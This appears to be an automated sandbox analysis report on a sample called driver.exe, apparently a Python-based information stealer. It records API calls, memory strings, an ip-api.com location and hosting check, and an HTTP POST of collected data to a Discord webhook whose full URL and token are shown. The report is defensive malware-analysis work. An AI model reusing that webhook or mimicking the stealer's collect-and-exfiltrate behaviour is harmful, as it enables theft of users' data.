Source:	Binary string: api-ms-win-core-handle-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2050744012.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: driver.exe, 00000000.00000003.2050389879.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2052114302.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: driver.exe, 00000002.00000002.2452545913.00007FF8B7DF1000.00000040.00000001.01000000.00000012.sdmp
Source:	Binary string: api-ms-win-core-file-l1-1-0.pdb source: driver.exe, 00000000.00000003.2050482974.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdbGCTL source: driver.exe, 00000000.00000003.2052601392.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-process-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2053499525.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: driver.exe, 00000000.00000003.2053032876.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-util-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2052849472.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-datetime-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2050203653.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: driver.exe, 00000002.00000002.2455696626.00007FF8B93C1000.00000040.00000001.01000000.0000000A.sdmp
Source:	Binary string: api-ms-win-core-errorhandling-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2050389879.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ucrtbase.pdbUGP source: driver.exe, 00000002.00000002.2452292275.00007FF8A8EF1000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: driver.exe, 00000002.00000002.2453359812.00007FF8B7E51000.00000040.00000001.01000000.0000000D.sdmp
Source:	Binary string: api-ms-win-crt-stdio-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2053705049.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-convert-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2053032876.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: driver.exe, 00000002.00000002.2446639595.00007FF8A8027000.00000040.00000001.01000000.00000014.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-3.pdb\| source: driver.exe, 00000002.00000002.2448164791.00007FF8A855A000.00000040.00000001.01000000.00000011.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdbDD source: driver.exe, 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmp
Source:	Binary string: api-ms-win-core-profile-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2052283988.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdbGCTL source: driver.exe, 00000000.00000003.2050573747.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: driver.exe, 00000000.00000003.2050203653.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: driver.exe, 00000000.00000003.2052933128.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: driver.exe, driver.exe, 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: api-ms-win-crt-math-l1-1-0.pdb source: driver.exe, 00000000.00000003.2053425753.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-3.pdb source: driver.exe, driver.exe, 00000002.00000002.2448164791.00007FF8A855A000.00000040.00000001.01000000.00000011.sdmp
Source:	Binary string: api-ms-win-core-interlocked-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2051019921.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-locale-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2053342813.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: driver.exe, 00000000.00000003.2054053292.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: driver.exe, 00000000.00000003.2052770906.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-string-l1-1-0.pdb source: driver.exe, 00000000.00000003.2052448279.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l2-1-0.pdb source: driver.exe, 00000000.00000003.2050665502.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WA source: driver.exe
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: driver.exe, 00000002.00000002.2454712947.00007FF8B8B3B000.00000040.00000001.01000000.00000009.sdmp
Source:	Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: driver.exe, 00000000.00000003.2051128075.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: driver.exe, 00000002.00000002.2455998173.00007FF8B9841000.00000040.00000001.01000000.00000013.sdmp
Source:	Binary string: api-ms-win-core-namedpipe-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2051451471.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2053584283.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processthreads-l1-1-1.pdbGCTL source: driver.exe, 00000000.00000003.2052186692.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: driver.exe, 00000002.00000002.2454106900.00007FF8B8AF1000.00000040.00000001.01000000.0000000B.sdmp
Source:	Binary string: 8C:\Users\user\AppData\Local\Temp\c4gv4hox\c4gv4hox.pdbhP source: powershell.exe, 0000002F.00000002.2261891481.0000028F80385000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-conio-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2052933128.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\driver.exe	Code function: 0_2_00007FF6A29B83B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00007FF6A29B83B0
Source: C:\Users\user\Desktop\driver.exe	Code function: 0_2_00007FF6A29B92F0 FindFirstFileExW,FindClose,	0_2_00007FF6A29B92F0
Source: C:\Users\user\Desktop\driver.exe	Code function: 0_2_00007FF6A29D18E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00007FF6A29D18E4
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF6A29B92F0 FindFirstFileExW,FindClose,	2_2_00007FF6A29B92F0
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF6A29B83B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	2_2_00007FF6A29B83B0
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF6A29D18E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	2_2_00007FF6A29D18E4
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF7542646EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	77_2_00007FF7542646EC
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF7542A88E0 FindFirstFileExA,	77_2_00007FF7542A88E0
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF75425E21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,	77_2_00007FF75425E21C

Networking

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping localhost -n 3

Source: global traffic

TCP traffic: 192.168.2.5:51955 -> 162.159.36.2:53

Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View	IP Address: 162.159.137.232 162.159.137.232

Source: unknown

DNS query: name: ip-api.com

Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.3.0

Source: driver.exe, 00000002.00000003.2329743274.000001C0EEED4000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: driver.exe, 00000002.00000003.2329743274.000001C0EEED4000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: discord.com

Source: unknown

HTTP traffic detected: POST /api/webhooks/1326920011201118251/xRN_dhCbCT8HeZRae0xJk1yw1sh06GaK4mq7ylVag5fFfCbHC0_LWfgjquGILOcXtJ2V HTTP/1.1Host: discord.comAccept-Encoding: identityContent-Length: 726172User-Agent: python-urllib3/2.3.0Content-Type: multipart/form-data; boundary=de3ccc329bb54b36f6288e69cf93885a

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 10:00:41 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1736503243x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NV9omaOnoMiwOGvkRDgo7SiGweJrmgfyLVRfBNckAnW2%2Bz92ZiQGy9Gam2yFFlgXYRpsX1ImMt%2BsUGDqL9wo75RjJQw%2BBT%2BHnhGewl%2F80WkPXiscRONUgxymqGbz"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=498f3b3fed20652a61917c341884d7aa84696853-1736503241; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=VbHab4IqB6lQjgKMolM4ulgWWvtlWgKW2e_NqXUOIoc-1736503241973-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8ffbd24abd5d43af-EWR

Source: driver.exe, 00000000.00000003.2058474705.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digi
Source: driver.exe, 00000000.00000003.2058474705.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digiN
Source: driver.exe, 00000000.00000003.2058474705.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2058564127.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2057639967.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: driver.exe, 00000000.00000003.2058474705.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2058564127.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2057639967.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: driver.exe, 00000000.00000003.2058474705.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2058564127.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2057639967.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: driver.exe, 00000000.00000003.2058474705.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2058564127.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2057639967.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: driver.exe, 00000002.00000002.2438981271.000001C0EDBD4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
Source: driver.exe, 00000000.00000003.2060119288.000001C6D727C000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2059613372.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: driver.exe, 00000002.00000003.2188298866.000001C0EE1C6000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2435146578.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2439933972.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2335408296.000001C0EE1C6000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2434711716.000001C0EE1C6000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2435979821.000001C0EE1C6000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2437809693.000001C0EBD9A000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2149672861.000001C0EE1C6000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2439933972.000001C0EE1DE000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2438981271.000001C0EDBD4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2248423197.000001A9CE030000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2319612460.0000028FF7F10000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3297044409.000002106B68D000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000040.00000003.2218706079.00000224C5264000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000040.00000002.2497855608.00000224C5264000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000040.00000003.2220783237.00000224C5264000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 0000002F.00000002.2321765178.0000028FF8040000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: driver.exe, 00000000.00000003.2059613372.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: driver.exe, 00000000.00000003.2059613372.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: svchost.exe, 00000030.00000002.3296597335.000002106B600000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: driver.exe, 00000000.00000003.2058474705.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2058564127.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2057639967.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: driver.exe, 00000000.00000003.2058474705.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2058564127.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2057639967.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: driver.exe, 00000000.00000003.2058474705.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2058564127.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2057639967.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: driver.exe, 00000000.00000003.2057639967.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: driver.exe, 00000000.00000003.2058474705.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2058564127.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2057639967.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: driver.exe, 00000000.00000003.2059613372.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: driver.exe, 00000002.00000003.2076155450.000001C0EDC78000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);
Source: svchost.exe, 00000030.00000003.2157180555.000002106B800000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: driver.exe, 00000002.00000002.2438981271.000001C0EDBD4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.com/
Source: driver.exe, 00000002.00000003.2188298866.000001C0EE1C6000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2335408296.000001C0EE1C6000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2434711716.000001C0EE1C6000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2435979821.000001C0EE1C6000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2149672861.000001C0EE1C6000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2439933972.000001C0EE1DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.com/mail/
Source: driver.exe, 00000002.00000003.2435146578.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2334802815.000001C0EE235000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2439933972.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2189780430.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2335486016.000001C0EE0AE000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2435979821.000001C0EE237000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2439933972.000001C0EE237000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2150956098.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
Source: driver.exe, 00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/json/?fields=225545
Source: driver.exe, 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/json/?fields=225545r
Source: driver.exe, 00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: driver.exe, 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hostingr~
Source: driver.exe, 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hostingr~r
Source: powershell.exe, 0000000E.00000002.2243088797.000001A9C5C53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2310314643.0000028F901BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2261891481.0000028F8196B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2310314643.0000028F9007A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: driver.exe, 00000000.00000003.2060119288.000001C6D727C000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2059613372.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: driver.exe, 00000000.00000003.2058474705.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2058564127.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2057639967.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: driver.exe, 00000000.00000003.2058474705.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2058564127.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2057639967.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: driver.exe, 00000000.00000003.2058474705.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2058564127.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2057639967.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: driver.exe, 00000000.00000003.2058474705.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2058564127.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2057639967.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: driver.exe, 00000000.00000003.2059613372.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: driver.exe, 00000000.00000003.2059613372.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.thawte.com0
Source: powershell.exe, 0000002F.00000002.2261891481.0000028F8022A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: driver.exe, 00000000.00000003.2060119288.000001C6D727C000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2059613372.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: driver.exe, 00000000.00000003.2060119288.000001C6D727C000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2059613372.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.symcd.com06
Source: powershell.exe, 0000000E.00000002.2214718488.000001A9B5E0A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 0000000E.00000002.2214718488.000001A9B5BE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2261891481.0000028F80001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000E.00000002.2214718488.000001A9B5E0A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: driver.exe, 00000002.00000002.2442254486.000001C0EE6B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
Source: driver.exe, 00000000.00000003.2060119288.000001C6D727C000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2059613372.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: driver.exe, 00000000.00000003.2059613372.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: driver.exe, 00000000.00000003.2060119288.000001C6D727C000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2059613372.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: driver.exe, 00000000.00000003.2059613372.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: driver.exe, 00000000.00000003.2059613372.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: driver.exe, 00000000.00000003.2060119288.000001C6D727C000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2059613372.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: powershell.exe, 0000002F.00000002.2261891481.0000028F81653000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 0000002F.00000002.2261891481.0000028F8022A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: driver.exe, 00000000.00000003.2058474705.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2058564127.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2057639967.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: driver.exe, 00000002.00000002.2438981271.000001C0EDCB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
Source: powershell.exe, 0000002F.00000002.2315796197.0000028FF5F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://MD8.mozilla.org/1/m
Source: driver.exe, 00000002.00000003.2334802815.000001C0EE22F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: driver.exe, 00000002.00000002.2445265789.000001C0EF73C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://account.bellmedia.c
Source: powershell.exe, 0000000E.00000002.2214718488.000001A9B5BE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2261891481.0000028F80001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
